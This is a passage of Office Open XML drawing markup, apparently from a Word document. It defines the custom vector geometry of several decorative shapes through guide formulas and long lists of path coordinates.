                                      <a:pt x="46" y="169"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="152"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="148"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="152"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="161"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="165"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="82" y="165"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="161"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="139"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="126"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="126"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="126"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="139"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="148"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="139"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="126"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="117"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="160" y="148"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="191" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="227" y="161"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="232" y="161"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="238" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="232" y="148"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="222" y="148"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="212" y="148"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="196" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="165" y="130"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="109"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="104"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="104"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="165" y="109"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="176" y="117"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="191" y="126"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="212" y="117"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="222" y="104"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="217" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="212" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="196" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="181" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="160" y="87"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="150" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="150" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="170" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="227" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="232" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="232" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="212" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="191" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="160" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="70"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="87"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="124" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="57"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="83"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="57"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="207" y="2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268"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9504" y="2823"/>
                                <a:ext cx="36" cy="26"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 36 w 36"/>
                                  <a:gd name="T1" fmla="*/ 13 h 26"/>
                                  <a:gd name="T2" fmla="*/ 31 w 36"/>
                                  <a:gd name="T3" fmla="*/ 22 h 26"/>
                                  <a:gd name="T4" fmla="*/ 21 w 36"/>
                                  <a:gd name="T5" fmla="*/ 26 h 26"/>
                                  <a:gd name="T6" fmla="*/ 11 w 36"/>
                                  <a:gd name="T7" fmla="*/ 22 h 26"/>
                                  <a:gd name="T8" fmla="*/ 0 w 36"/>
                                  <a:gd name="T9" fmla="*/ 13 h 26"/>
                                  <a:gd name="T10" fmla="*/ 5 w 36"/>
                                  <a:gd name="T11" fmla="*/ 5 h 26"/>
                                  <a:gd name="T12" fmla="*/ 16 w 36"/>
                                  <a:gd name="T13" fmla="*/ 0 h 26"/>
                                  <a:gd name="T14" fmla="*/ 26 w 36"/>
                                  <a:gd name="T15" fmla="*/ 5 h 26"/>
                                  <a:gd name="T16" fmla="*/ 36 w 36"/>
                                  <a:gd name="T17"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3"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36"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269"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7804" y="2845"/>
                                <a:ext cx="1695" cy="17"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 1674 w 1695"/>
                                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                                  <a:gd name="T2" fmla="*/ 1695 w 1695"/>
                                  <a:gd name="T3" fmla="*/ 13 h 17"/>
                                  <a:gd name="T4" fmla="*/ 1685 w 1695"/>
                                  <a:gd name="T5" fmla="*/ 13 h 17"/>
                                  <a:gd name="T6" fmla="*/ 1680 w 1695"/>
                                  <a:gd name="T7" fmla="*/ 13 h 17"/>
                                  <a:gd name="T8" fmla="*/ 1669 w 1695"/>
                                  <a:gd name="T9" fmla="*/ 13 h 17"/>
                                  <a:gd name="T10" fmla="*/ 1643 w 1695"/>
                                  <a:gd name="T11" fmla="*/ 13 h 17"/>
                                  <a:gd name="T12" fmla="*/ 1612 w 1695"/>
                                  <a:gd name="T13" fmla="*/ 13 h 17"/>
                                  <a:gd name="T14" fmla="*/ 1576 w 1695"/>
                                  <a:gd name="T15" fmla="*/ 13 h 17"/>
                                  <a:gd name="T16" fmla="*/ 1530 w 1695"/>
                                  <a:gd name="T17" fmla="*/ 13 h 17"/>
                                  <a:gd name="T18" fmla="*/ 1478 w 1695"/>
                                  <a:gd name="T19" fmla="*/ 13 h 17"/>
                                  <a:gd name="T20" fmla="*/ 1421 w 1695"/>
                                  <a:gd name="T21" fmla="*/ 13 h 17"/>
                                  <a:gd name="T22" fmla="*/ 1359 w 1695"/>
                                  <a:gd name="T23" fmla="*/ 13 h 17"/>
                                  <a:gd name="T24" fmla="*/ 1292 w 1695"/>
                                  <a:gd name="T25" fmla="*/ 13 h 17"/>
                                  <a:gd name="T26" fmla="*/ 1152 w 1695"/>
                                  <a:gd name="T27" fmla="*/ 13 h 17"/>
                                  <a:gd name="T28" fmla="*/ 997 w 1695"/>
                                  <a:gd name="T29" fmla="*/ 13 h 17"/>
                                  <a:gd name="T30" fmla="*/ 842 w 1695"/>
                                  <a:gd name="T31" fmla="*/ 13 h 17"/>
                                  <a:gd name="T32" fmla="*/ 687 w 1695"/>
                                  <a:gd name="T33" fmla="*/ 13 h 17"/>
                                  <a:gd name="T34" fmla="*/ 532 w 1695"/>
                                  <a:gd name="T35" fmla="*/ 13 h 17"/>
                                  <a:gd name="T36" fmla="*/ 387 w 1695"/>
                                  <a:gd name="T37" fmla="*/ 13 h 17"/>
                                  <a:gd name="T38" fmla="*/ 325 w 1695"/>
                                  <a:gd name="T39" fmla="*/ 13 h 17"/>
                                  <a:gd name="T40" fmla="*/ 263 w 1695"/>
                                  <a:gd name="T41" fmla="*/ 13 h 17"/>
                                  <a:gd name="T42" fmla="*/ 206 w 1695"/>
                                  <a:gd name="T43" fmla="*/ 13 h 17"/>
                                  <a:gd name="T44" fmla="*/ 155 w 1695"/>
                                  <a:gd name="T45" fmla="*/ 13 h 17"/>
                                  <a:gd name="T46" fmla="*/ 108 w 1695"/>
                                  <a:gd name="T47" fmla="*/ 13 h 17"/>
                                  <a:gd name="T48" fmla="*/ 72 w 1695"/>
                                  <a:gd name="T49" fmla="*/ 13 h 17"/>
                                  <a:gd name="T50" fmla="*/ 41 w 1695"/>
                                  <a:gd name="T51" fmla="*/ 13 h 17"/>
                                  <a:gd name="T52" fmla="*/ 15 w 1695"/>
                                  <a:gd name="T53" fmla="*/ 17 h 17"/>
                                  <a:gd name="T54" fmla="*/ 0 w 1695"/>
                                  <a:gd name="T55" fmla="*/ 17 h 17"/>
                                  <a:gd name="T56" fmla="*/ 0 w 1695"/>
                                  <a:gd name="T57" fmla="*/ 17 h 17"/>
                                  <a:gd name="T58" fmla="*/ 0 w 1695"/>
                                  <a:gd name="T59" fmla="*/ 4 h 17"/>
                                  <a:gd name="T60" fmla="*/ 5 w 1695"/>
                                  <a:gd name="T61" fmla="*/ 0 h 17"/>
                                  <a:gd name="T62" fmla="*/ 1674 w 1695"/>
                                  <a:gd name="T6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95" h="17">
                                    <a:moveTo>
                                      <a:pt x="1674" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="1695" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1685" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1680" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1669" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1643" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1612" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1576" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1530" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1478" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1421" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1359" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1292" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1152" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="997" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="842" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="687" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="532" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="387" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="325" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="263" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="206" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1674"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270"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7468" y="2845"/>
                                <a:ext cx="201" cy="156"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 46 w 201"/>
                                  <a:gd name="T1" fmla="*/ 22 h 156"/>
                                  <a:gd name="T2" fmla="*/ 41 w 201"/>
                                  <a:gd name="T3" fmla="*/ 4 h 156"/>
                                  <a:gd name="T4" fmla="*/ 62 w 201"/>
                                  <a:gd name="T5" fmla="*/ 39 h 156"/>
                                  <a:gd name="T6" fmla="*/ 72 w 201"/>
                                  <a:gd name="T7" fmla="*/ 26 h 156"/>
                                  <a:gd name="T8" fmla="*/ 88 w 201"/>
                                  <a:gd name="T9" fmla="*/ 48 h 156"/>
                                  <a:gd name="T10" fmla="*/ 103 w 201"/>
                                  <a:gd name="T11" fmla="*/ 48 h 156"/>
                                  <a:gd name="T12" fmla="*/ 124 w 201"/>
                                  <a:gd name="T13" fmla="*/ 61 h 156"/>
                                  <a:gd name="T14" fmla="*/ 129 w 201"/>
                                  <a:gd name="T15" fmla="*/ 52 h 156"/>
                                  <a:gd name="T16" fmla="*/ 134 w 201"/>
                                  <a:gd name="T17" fmla="*/ 74 h 156"/>
                                  <a:gd name="T18" fmla="*/ 144 w 201"/>
                                  <a:gd name="T19" fmla="*/ 82 h 156"/>
                                  <a:gd name="T20" fmla="*/ 160 w 201"/>
                                  <a:gd name="T21" fmla="*/ 91 h 156"/>
                                  <a:gd name="T22" fmla="*/ 175 w 201"/>
                                  <a:gd name="T23" fmla="*/ 91 h 156"/>
                                  <a:gd name="T24" fmla="*/ 170 w 201"/>
                                  <a:gd name="T25" fmla="*/ 69 h 156"/>
                                  <a:gd name="T26" fmla="*/ 170 w 201"/>
                                  <a:gd name="T27" fmla="*/ 56 h 156"/>
                                  <a:gd name="T28" fmla="*/ 191 w 201"/>
                                  <a:gd name="T29" fmla="*/ 82 h 156"/>
                                  <a:gd name="T30" fmla="*/ 196 w 201"/>
                                  <a:gd name="T31" fmla="*/ 121 h 156"/>
                                  <a:gd name="T32" fmla="*/ 150 w 201"/>
                                  <a:gd name="T33" fmla="*/ 108 h 156"/>
                                  <a:gd name="T34" fmla="*/ 139 w 201"/>
                                  <a:gd name="T35" fmla="*/ 156 h 156"/>
                                  <a:gd name="T36" fmla="*/ 67 w 201"/>
                                  <a:gd name="T37" fmla="*/ 138 h 156"/>
                                  <a:gd name="T38" fmla="*/ 93 w 201"/>
                                  <a:gd name="T39" fmla="*/ 134 h 156"/>
                                  <a:gd name="T40" fmla="*/ 108 w 201"/>
                                  <a:gd name="T41" fmla="*/ 130 h 156"/>
                                  <a:gd name="T42" fmla="*/ 103 w 201"/>
                                  <a:gd name="T43" fmla="*/ 117 h 156"/>
                                  <a:gd name="T44" fmla="*/ 46 w 201"/>
                                  <a:gd name="T45" fmla="*/ 113 h 156"/>
                                  <a:gd name="T46" fmla="*/ 57 w 201"/>
                                  <a:gd name="T47" fmla="*/ 108 h 156"/>
                                  <a:gd name="T48" fmla="*/ 82 w 201"/>
                                  <a:gd name="T49" fmla="*/ 113 h 156"/>
                                  <a:gd name="T50" fmla="*/ 88 w 201"/>
                                  <a:gd name="T51" fmla="*/ 100 h 156"/>
                                  <a:gd name="T52" fmla="*/ 77 w 201"/>
                                  <a:gd name="T53" fmla="*/ 95 h 156"/>
                                  <a:gd name="T54" fmla="*/ 72 w 201"/>
                                  <a:gd name="T55" fmla="*/ 82 h 156"/>
                                  <a:gd name="T56" fmla="*/ 26 w 201"/>
                                  <a:gd name="T57" fmla="*/ 74 h 156"/>
                                  <a:gd name="T58" fmla="*/ 10 w 201"/>
                                  <a:gd name="T59" fmla="*/ 69 h 156"/>
                                  <a:gd name="T60" fmla="*/ 41 w 201"/>
                                  <a:gd name="T61" fmla="*/ 74 h 156"/>
                                  <a:gd name="T62" fmla="*/ 62 w 201"/>
                                  <a:gd name="T63" fmla="*/ 74 h 156"/>
                                  <a:gd name="T64" fmla="*/ 51 w 201"/>
                                  <a:gd name="T65" fmla="*/ 61 h 156"/>
                                  <a:gd name="T66" fmla="*/ 5 w 201"/>
                                  <a:gd name="T67" fmla="*/ 52 h 156"/>
                                  <a:gd name="T68" fmla="*/ 20 w 201"/>
                                  <a:gd name="T69" fmla="*/ 52 h 156"/>
                                  <a:gd name="T70" fmla="*/ 46 w 201"/>
                                  <a:gd name="T71" fmla="*/ 52 h 156"/>
                                  <a:gd name="T72" fmla="*/ 46 w 201"/>
                                  <a:gd name="T73" fmla="*/ 43 h 156"/>
                                  <a:gd name="T74" fmla="*/ 20 w 201"/>
                                  <a:gd name="T75" fmla="*/ 39 h 156"/>
                                  <a:gd name="T76" fmla="*/ 5 w 201"/>
                                  <a:gd name="T77" fmla="*/ 30 h 156"/>
                                  <a:gd name="T78" fmla="*/ 15 w 201"/>
                                  <a:gd name="T79" fmla="*/ 22 h 156"/>
                                  <a:gd name="T80" fmla="*/ 0 w 201"/>
                                  <a:gd name="T81" fmla="*/ 4 h 156"/>
                                  <a:gd name="T82" fmla="*/ 10 w 201"/>
                                  <a:gd name="T83" fmla="*/ 0 h 156"/>
                                  <a:gd name="T84" fmla="*/ 26 w 201"/>
                                  <a:gd name="T85" fmla="*/ 17 h 156"/>
                                  <a:gd name="T86" fmla="*/ 41 w 201"/>
                                  <a:gd name="T87" fmla="*/ 22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156">
                                    <a:moveTo>
                                      <a:pt x="41" y="22"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="82" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="124" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="144" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="160" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="170" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="175" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="181" y="87"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="170" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="170" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="170" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="186" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="191" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="201" y="117"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="196" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="165" y="113"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="150" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="139" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="151"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="138"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="82" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="130"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="117"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="113"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="113"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="82" y="113"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="104"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="100"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="82" y="100"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="82" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="22"/>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271"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7664" y="2845"/>
                                <a:ext cx="31" cy="39"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 31 w 31"/>
                                  <a:gd name="T1" fmla="*/ 39 h 39"/>
                                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                                  <a:gd name="T3" fmla="*/ 0 h 39"/>
                                  <a:gd name="T4" fmla="*/ 21 w 31"/>
